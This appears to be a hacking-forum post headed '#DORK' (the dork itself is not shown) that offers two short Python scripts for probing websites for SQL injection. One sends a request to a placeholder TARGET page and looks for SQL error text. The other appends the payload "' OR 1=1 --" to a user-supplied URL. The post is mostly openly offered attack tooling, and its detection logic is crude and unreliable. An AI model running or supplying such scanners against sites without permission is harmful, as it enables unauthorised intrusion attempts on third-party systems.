#DORK :
OR CODE
Code:
import requests
url = "https://TARGET/about/news/index.jsp?page=2"
# Send a GET request to the URL
response = requests.get(url)
# Check the response status code
if response.status_code == 200:
# Check for common SQL injection error messages
if "SQL error" in response.text or "syntax error" in response.text:
print("Potential SQL injection vulnerability detected!")
else:
print("No obvious SQL injection vulnerabilities found.")
else:
print("Failed to connect to the URL.")OR CODE
Code:
import requests
import sys
def sql_injection_test(url):
# Test for SQL injection vulnerability
test_payload = "' OR 1=1 --"
test_url = url + "?id=" + test_payload
try:
response = requests.get(test_url)
if "SQL injection" in response.text:
print(f"The URL {url} is vulnerable to SQL injection!")
else:
print(f"The URL {url} does not appear to be vulnerable to SQL injection.")
except requests.exceptions.RequestException as e:
print(f"An error occurred: {e}")
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python sql_injection_test.py <url>")
sys.exit(1)
url = sys.argv[1]
sql_injection_test(url)
Last edited:
![[DK]](/data/avatars/s/57/57999.jpg?1720990206){kind=avatar}
